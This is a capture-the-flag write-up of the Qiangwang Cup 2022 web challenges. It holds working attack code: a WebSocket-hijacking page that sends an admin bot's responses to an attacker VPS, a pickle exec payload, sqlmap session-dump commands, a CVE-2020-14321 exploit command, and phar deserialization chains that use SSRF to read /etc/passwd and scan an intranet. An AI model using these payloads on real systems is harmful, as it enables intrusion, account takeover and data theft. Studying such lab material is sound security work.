Qiangwang Cup 2022 - WEB
2022-08-04 21:33:00 【Arnoldqqq】
Qiangwang Pioneer
rcefile
Download the source from www.zip; the blacklist filtering is visible.
spl_autoload_register is enabled with no restrictions, so when deserialization instantiates a class named test, the autoloader automatically includes test.php or test.inc from the current directory.
Upload an .inc file, regenerate the serialized data, and finally have config.inc.php include it to run the webshell.
WEB
babyweb
The app talks over the WebSocket protocol and does not check the Origin header of the handshake request, so it is open to CSWSH (Cross-Site WebSocket Hijacking), the WebSocket counterpart of CSRF.
Take the challenge's ws JavaScript, point it at your own VPS and have the admin bot check it: a connection is established and a password-change request is sent. With the modification I made here, the result of the command is bounced back, so the VPS only has to listen on two ports.
```html
<!DOCTYPE html>
<meta charset="utf-8" />
<title>WebSocket Test</title>
<script language="javascript" type="text/javascript">
var ws = null;
var url = "ws://127.0.0.1:8888/bot";
function init() { sendtobot(); }
function sendtobot() {
    if (ws) {
        var msg = "changepw 123456";
        ws.send(msg);
    } else {
        ws = new WebSocket(url);
        ws.onopen = function (event) {
            console.log('connection open!');
            var msg = "changepw 123456";
            ws.send(msg);
        };
        ws.onmessage = function (ev) { botsay(ev.data); };
        ws.onerror = function () { console.log("connection error"); };
        ws.onclose = function () { console.log("connection close!"); };
    }
}
function botsay(content) {
    // relay the bot's reply to the listener on the VPS
    document.location = 'http://vps:7777?c=bot: ' + content;
}
function closeWebSocket() {
    if (ws) { ws.close(); ws = null; }
}
window.addEventListener("load", init, false);
</script>
```
Then log in to the admin account, buy the hint, and obtain the download address of the back-end source code.
A negative number subtracted from cost makes money increase,
but the Python backend hard-codes a check that num is reasonable.
Bypass it with a differential between the front and back JSON parsers:
the JSON parser in the Python standard library returns the last key-value pair for duplicate keys;
the Golang service uses a high-performance third-party JSON parser (buger/jsonparser), which returns the first key-value pair for duplicate keys.
Submit a negative value to add money, then buy the flag directly.
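The parser differential above, as an added Python illustration that is not code from the writeup: the validator parses last-wins like the stdlib, the order service is emulated as first-wins per the writeup's description of buger/jsonparser, and a strict hook shows the fix. The request body, the item field and the price are constructed assumptions.

```python
import json

# Constructed request body modelled on the writeup: the same "num" key twice,
# a negative value first and a valid-looking value last.
PAYLOAD = '{"item": "flag", "num": -1, "num": 1}'


def parse_last_wins(text: str) -> dict:
    """Python stdlib behaviour: with duplicate keys, json.loads keeps the last one."""
    return json.loads(text)


def parse_first_wins(text: str) -> dict:
    """Emulates the first-key-wins behaviour the writeup attributes to buger/jsonparser."""
    def keep_first(pairs):
        out = {}
        for key, value in pairs:
            out.setdefault(key, value)
        return out
    return json.loads(text, object_pairs_hook=keep_first)


def parse_strict(text: str) -> dict:
    """Hardened variant: reject any object with duplicate keys before either side acts on it."""
    def reject_dupes(pairs):
        seen = set()
        for key, _ in pairs:
            if key in seen:
                raise ValueError(f"duplicate key: {key!r}")
            seen.add(key)
        return dict(pairs)
    return json.loads(text, object_pairs_hook=reject_dupes)


def validator_accepts(text: str) -> bool:
    """The Python front-end check as the writeup describes it: num must be a positive integer."""
    num = parse_last_wins(text).get("num")
    return isinstance(num, int) and num > 0


def backend_charge(text: str, price: int) -> int:
    """Cost as the Go side computes it after a first-wins parse; a negative num becomes a credit."""
    return parse_first_wins(text)["num"] * price


def differential(text: str, price: int = 100) -> tuple:
    """Returns (validator verdict, amount the backend deducts) for one request body."""
    return validator_accepts(text), backend_charge(text, price)


if __name__ == "__main__":
    print(differential(PAYLOAD))  # (True, -100): accepted, yet money goes up
```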
crash
```
OBJ(GLOBAL('builtins', 'exec'), '''c="import admin;admin.s"+"ecret='1'";exec(c)''')
return
```
Generate the cookie with pker.
Use the malicious cookie to access /balancer and change admin's password, then log in normally.
Submit both weights as 0; any address is valid. Then wait a while for the simulation result to return the flag.
easylogin
https://zhuanlan.zhihu.com/p/471299626
https://cn-sec.com/archives/1206142.html
Run sqlmap to dump the data:
```shell
python sqlmap.py -r 2.txt --flush-session --random-agent -D moodle -T mdl_sessions --technique E --columns --batch
```
The user passwords are encrypted; from https://severalnines.com/blog/using-redis-offload-galera-cluster-session-management-data-moodle/ we learn that login sessions are stored in the database table mdl_sessions.
```shell
python sqlmap.py -r 2.txt --flush-session --random-agent -D moodle -T mdl_sessions -C id,sid,userid,sessdata --technique E --batch --dump
```
Then replace the cookie value on the login page to enter the admin page. (In practice, use the sid whose userid is 2; the environment was having problems while I was writing this writeup.)
Use this exp: https://github.com/HoangKien1020/CVE-2020-14321
Run the script to execute commands, or manually upload a zip to execute commands.
```shell
python3 cve202014321.py -url http://47.105.52.19:8888 -cookie=rpu74vh353tiflel5ncdilqka7 -cmd=cat //etc/mytest/flaaaaaaaggggggggggggggggggggg
```
easyweb
Use the php:// pseudo-protocol to read the source code; insert demo or guest at a position where it does not affect the filter chain in order to bypass the detection:
/showfile.php?f=php://filter/read=convert.base64-encode/demo/resource=upload.php
Upload the file via SESSION_UPLOAD_PROGRESS:
```python
import requests
import io

url = "http://47.104.95.124:8080/upload.php"
f = io.BytesIO(b"t" * 1024 * 50)

# Sending PHP_SESSION_UPLOAD_PROGRESS together with a matching PHPSESSID makes PHP
# record the upload in the session; the response reveals the upload directory.
r = requests.post(url=url,
                  data={"PHP_SESSION_UPLOAD_PROGRESS": "2333"},
                  files={"file": open("fixd_phar.jpg", "rb")},
                  cookies={"PHPSESSID": "2333"})
path = r.text.split(" ")[-2].split("/")[-2]
# The phar:// wrapper parses the uploaded archive's metadata when the file is opened.
r = requests.get(f"http://47.104.95.124:8080/showfile.php?f=phar:///var/www/html/{path}/fixd_phar.jpg/demo.txt",
                 timeout=1)
print(r.text)
```
The phar generation script is as follows; the pop chain it builds is:
AdminShow#__wakeup -> GuestShow#__toString -> AdminShow#__get -> AdminShow#show
```php
<?php
class GuestShow{
    public $file;
    public $contents;
    public function __construct($file)
    {
        $this->file=$file;
    }
    function __toString(){
        $str = $this->file->name;
        return "";
    }
    function __get($value){
        return $this->$value;
    }
    function show()
    {
        $this->contents = file_get_contents($this->file);
        $src = "data:jpg;base64,".base64_encode($this->contents);
        echo "<img src={$src} />";
    }
    function __destruct(){
        echo $this;
    }
}
class AdminShow{
    public $source;
    public $str;
    public $filter;
    public function __construct($file)
    {
        $this->source = $file;
        $this->schema = '';
    }
    public function __toString()
    {
        $content = $this->str[0]->source;
        $content = $this->str[1]->schema;
        return $content;
    }
    public function __get($value){
        $this->show();
        return $this->$value;
    }
    public function __set($key,$value){
        $this->$key = $value;
    }
    public function show(){
        if(preg_match('/usr|auto|log/i' , $this->source))
        {
            die("error");
        }
        $url = $this->schema . $this->source;
        echo $url;
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_HEADER, 1);
        $response = curl_exec($curl);
        curl_close($curl);
        $src = "data:jpg;base64,".base64_encode($response);
        echo "<img src={$src} />";
    }
    public function __wakeup()
    {
        echo "wakeup";
        if ($this->schema !== 'file:///var/www/html/') {
            $this->schema = 'file:///var/www/html/';
        }
        if ($this->source !== 'admin.png') {
            $this->source = 'admin.png';
        }
    }
}
// Chain: AdminShow#__wakeup -> GuestShow#__toString -> AdminShow#__get -> AdminShow#show
$a = new AdminShow('a');
$b = new GuestShow('a');
$c = new AdminShow('file:///etc/passwd');
$b->file = $c;
$a->schema = $b;
echo serialize($a);
$phar = new Phar("phar.phar"); // the extension must be .phar
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); // set the stub
$phar->setMetadata($a); // store the custom metadata in the manifest
$phar->addFromString("demo.txt", "test"); // add a file to the archive; any name and content will do
$phar->stopBuffering();
?>
```
Alternatively, GuestShow#__destruct can directly trigger its own __toString:
```php
$a = new GuestShow("a");
$b = new AdminShow("file:///etc/passwd");
$a->file = $b;
```
The __wakeup bypass works by declaring more properties in the serialized data than the object actually has: change the property count from 1 to 5, or delete the schema property.
The modified file still needs its phar signature repaired:
```python
# -*- coding: utf-8 -*-
from hashlib import sha1

with open('phar.jpg', 'rb') as fp:
    f = fp.read()                  # the phar file after editing its contents
s = f[:-28]                        # the data to be signed (everything before the 28-byte trailer)
h = f[-8:]                         # the signature type flag plus the GBMB magic
newf = s + sha1(s).digest() + h    # data + signature + type + GBMB
with open('fixd_phar.jpg', 'wb') as fp:
    fp.write(newf)                 # write the repaired file
```
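As an added defensive counterpart to the repair script (not code from the writeup), a Python check an upload handler could run on received "images": it looks for the __HALT_COMPILER stub and validates the hash signature in the phar trailer, generalising the 28-byte SHA1 split above to the other hash types. The sample polyglot and its placeholder manifest are constructed here.

```python
import hashlib
import struct

# Signature-type flags stored in the 4 bytes before the "GBMB" magic (PHP phar format).
# OpenSSL signatures (0x10) are not handled: they need the public key, not a hash.
_HASH_SIGS = {0x01: ("md5", 16), 0x02: ("sha1", 20), 0x04: ("sha256", 32), 0x08: ("sha512", 64)}


def inspect_phar(data: bytes) -> dict:
    """Report whether a blob carries a phar stub and whether its trailer signature verifies."""
    report = {"has_stub": b"__HALT_COMPILER" in data, "signed": False, "algo": None, "sig_valid": False}
    if len(data) < 8 or data[-4:] != b"GBMB":
        return report                      # no phar trailer (plain image, or truncated file)
    flag = struct.unpack("<I", data[-8:-4])[0]
    if flag not in _HASH_SIGS:
        return report
    algo, size = _HASH_SIGS[flag]
    report.update(signed=True, algo=algo)
    body, sig = data[:-(size + 8)], data[-(size + 8):-8]   # same split the repair script uses for SHA1
    report["sig_valid"] = hashlib.new(algo, body).digest() == sig
    return report


def sign_phar(body: bytes, algo: str = "sha1") -> bytes:
    """Append a fresh hash signature, its type flag and the GBMB magic to an unsigned phar body."""
    flag = next(f for f, (name, _) in _HASH_SIGS.items() if name == algo)
    return body + hashlib.new(algo, body).digest() + struct.pack("<I", flag) + b"GBMB"


# Constructed sample: a GIF/phar polyglot shaped like the writeup's stub, with a placeholder
# standing in for the real manifest, signed the way PHP would sign it.
SAMPLE = sign_phar(b"GIF89a<?php __HALT_COMPILER(); ?>\r\n" + b"<manifest placeholder>")
# The same archive with its body edited but the old trailer left in place (what the
# repair script exists to fix).
TAMPERED = SAMPLE.replace(b"placeholder", b"tampered!!!")

if __name__ == "__main__":
    print(inspect_phar(SAMPLE))    # signed sha1, sig_valid True
    print(inspect_phar(TAMPERED))  # signed sha1, sig_valid False
```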
In fact, none of that is needed: because the AdminShow class has no declared schema property, deserialization drops straight into __get, which bypasses the property reset in __wakeup and lets you control the values freely.
```php
<?php
class AdminShow
{
    public $source;
    public $str;
    public $filter;
    public function __construct($file)
    {
        $this->source = $file;
    }
}
$a = new AdminShow("file:///etc/passwd");
echo serialize($a);
$phar = new Phar("phar.phar"); // the extension must be .phar
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); // set the stub
$phar->setMetadata($a); // store the custom metadata in the manifest
$phar->addFromString("demo.txt", "test"); // add a file to the archive; any name and content will do
$phar->stopBuffering();
```
Then upload it with the script above, use the curl in AdminShow#show to scan the intranet (the target machine is in the 10.x range), and read the flag over the file:// protocol.